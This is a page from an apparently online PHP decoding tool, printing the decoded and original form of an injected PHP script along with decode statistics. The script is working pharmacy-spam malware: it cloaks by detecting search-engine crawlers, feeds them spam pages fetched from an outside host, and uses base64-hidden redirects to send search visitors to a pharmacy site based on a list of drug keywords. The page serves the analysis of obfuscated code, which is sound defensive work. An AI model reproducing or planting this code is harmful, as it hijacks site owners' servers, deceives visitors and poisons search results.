Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if (!defined('frmDs')){ define('frmDs' ,1); error_reporting(0); functio..
Decoded Output download
<? if (!defined('frmDs')){
define('frmDs' ,1);
error_reporting(0);
function frm_dl ($url)
{ if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch); if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else {$out = @file_get_contents($url);} return trim($out); } function frm_crpt($in){ $il=strlen($in);$o=''; for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; return $o; } function frm_getcache($tmpdir,$link,$cmtime,$del=true){ $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link)); if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime) { $dlc=frm_dl($link); if($dlc===false){ if(del) @unlink($f); else @touch($f); } else { if($fp = @fopen($f,'w')){ fwrite($fp, frm_crpt($dlc)); fclose($fp); }else{return $dlc;} } } $fc = @file_get_contents($f); return ($fc)?frm_crpt($fc):''; } function frm_isbot(){ $ua=@strtolower($_SERVER['HTTP_USER_AGENT']); if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590), array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566), array(3481178113,3481182206),array(2915172353,2915237886)); foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true; if(!$ua)return true; $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; $h=@gethostbyaddr($_SERVER['REMOTE_ADDR']); $hba=array('google','msn','yahoo'); if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true; return false; } function frm_tmpdir(){ $fs = array('/tmp','/var/tmp'); foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { if ($t = getenv($v)) {$fs[]=$t;} } if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} $fs[]='.'; foreach ($fs as $f){ $tf = $f.'/'.md5(rand()); if($fp = @fopen($tf, 'w')){ fclose($fp); unlink($tf); return $f; } } return false; } function frm_seref(){ $r = @strtolower($_SERVER["HTTP_REFERER"]); $ses = array('google','bing','yahoo','ask','aol'); foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true; return false; } function frm_isuniq($tdir){ $ip=$_SERVER['REMOTE_ADDR']; $dbf=$tdir.'/sess_'.md5(date('m.y')); if(strpos(frm_crpt(@file_get_contents($dbf)),$ip) === false ){ if ($fp=@fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);} return true; } return false; } function frm_havekey(){ $nks = explode('|','sildenafil|tadalafil|vardenafil|abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|zovirax'); $k = @strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]); if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return false; foreach ($nks as $n)if(preg_match("/(|_)$n(|_)/",$k)) return $n; return false; } $tdir = frm_tmpdir(); $ua=$_SERVER['HTTP_USER_AGENT']; $isb=frm_isbot(); $k=frm_havekey(); $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST'])); if($cv=@$_POST[md5($host.'ch')]){exit($cv);} if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){ $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3); $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0; $ruri = strtolower($_SERVER['REQUEST_URI']); if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){ if(!$isb && frm_seref()){ print(base64_decode('PCFET0NUWVBFIGh0bWw+PGh0bWw+PGJvZHk+PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlvbj0oImh0dHA6Ly9uYi1waGFybWFjeS5jb20=').($k?('/search.html?key='.$k):'').'");</script></body></html>'); exit; } print(frm_getcache($tdir,"http://nmzynrkpdpv.lookin.at/stat/feed.php?h=$host&p=$pageid&pa=$parg",60*24,false)); exit; } if (($ruri=='/' || $ruri=='/index.php') && $isb) { $c=frm_getcache($tdir,"http://nmzynrkpdpv.lookin.at/stat/feed.php?h=$host&pa=$parg",60*24,false); if($c){print($c);exit();} } } if(!$isb&&frm_seref()&&$k){ header(base64_decode('TG9jYXRpb246IGh0dHA6Ly9uYi1waGFybWFjeS5jb20vc2VhcmNoLmh0bWw/a2V5PQ==').$k);exit(); }}
?>Did this file decode correctly?
Original Code
if (!defined('frmDs')){
define('frmDs' ,1);
error_reporting(0);
function frm_dl ($url)
{ if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch); if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else {$out = @file_get_contents($url);} return trim($out); } function frm_crpt($in){ $il=strlen($in);$o=''; for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; return $o; } function frm_getcache($tmpdir,$link,$cmtime,$del=true){ $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link)); if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime) { $dlc=frm_dl($link); if($dlc===false){ if(del) @unlink($f); else @touch($f); } else { if($fp = @fopen($f,'w')){ fwrite($fp, frm_crpt($dlc)); fclose($fp); }else{return $dlc;} } } $fc = @file_get_contents($f); return ($fc)?frm_crpt($fc):''; } function frm_isbot(){ $ua=@strtolower($_SERVER['HTTP_USER_AGENT']); if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590), array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566), array(3481178113,3481182206),array(2915172353,2915237886)); foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true; if(!$ua)return true; $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; $h=@gethostbyaddr($_SERVER['REMOTE_ADDR']); $hba=array('google','msn','yahoo'); if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true; return false; } function frm_tmpdir(){ $fs = array('/tmp','/var/tmp'); foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { if ($t = getenv($v)) {$fs[]=$t;} } if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} $fs[]='.'; foreach ($fs as $f){ $tf = $f.'/'.md5(rand()); if($fp = @fopen($tf, 'w')){ fclose($fp); unlink($tf); return $f; } } return false; } function frm_seref(){ $r = @strtolower($_SERVER["HTTP_REFERER"]); $ses = array('google','bing','yahoo','ask','aol'); foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true; return false; } function frm_isuniq($tdir){ $ip=$_SERVER['REMOTE_ADDR']; $dbf=$tdir.'/sess_'.md5(date('m.y')); if(strpos(frm_crpt(@file_get_contents($dbf)),$ip) === false ){ if ($fp=@fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);} return true; } return false; } function frm_havekey(){ $nks = explode('|','sildenafil|tadalafil|vardenafil|abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|zovirax'); $k = @strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]); if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return false; foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/",$k)) return $n; return false; } $tdir = frm_tmpdir(); $ua=$_SERVER['HTTP_USER_AGENT']; $isb=frm_isbot(); $k=frm_havekey(); $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST'])); if($cv=@$_POST[md5($host.'ch')]){exit($cv);} if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){ $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3); $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0; $ruri = strtolower($_SERVER['REQUEST_URI']); if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){ if(!$isb && frm_seref()){ print(base64_decode('PCFET0NUWVBFIGh0bWw+PGh0bWw+PGJvZHk+PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlvbj0oImh0dHA6Ly9uYi1waGFybWFjeS5jb20=').($k?('/search.html?key='.$k):'').'");</script></body></html>'); exit; } print(frm_getcache($tdir,"http://nmzynrkpdpv.lookin.at/stat/feed.php?h=$host&p=$pageid&pa=$parg",60*24,false)); exit; } if (($ruri=='/' || $ruri=='/index.php') && $isb) { $c=frm_getcache($tdir,"http://nmzynrkpdpv.lookin.at/stat/feed.php?h=$host&pa=$parg",60*24,false); if($c){print($c);exit();} } } if(!$isb&&frm_seref()&&$k){ header(base64_decode('TG9jYXRpb246IGh0dHA6Ly9uYi1waGFybWFjeS5jb20vc2VhcmNoLmh0bWw/a2V5PQ==').$k);exit(); }}
Function Calls
| defined | 1 |
Stats
| MD5 | 3d22d7fb0b6eccdf9803b10288e7e822 |
| Eval Count | 0 |
| Decode Time | 123 ms |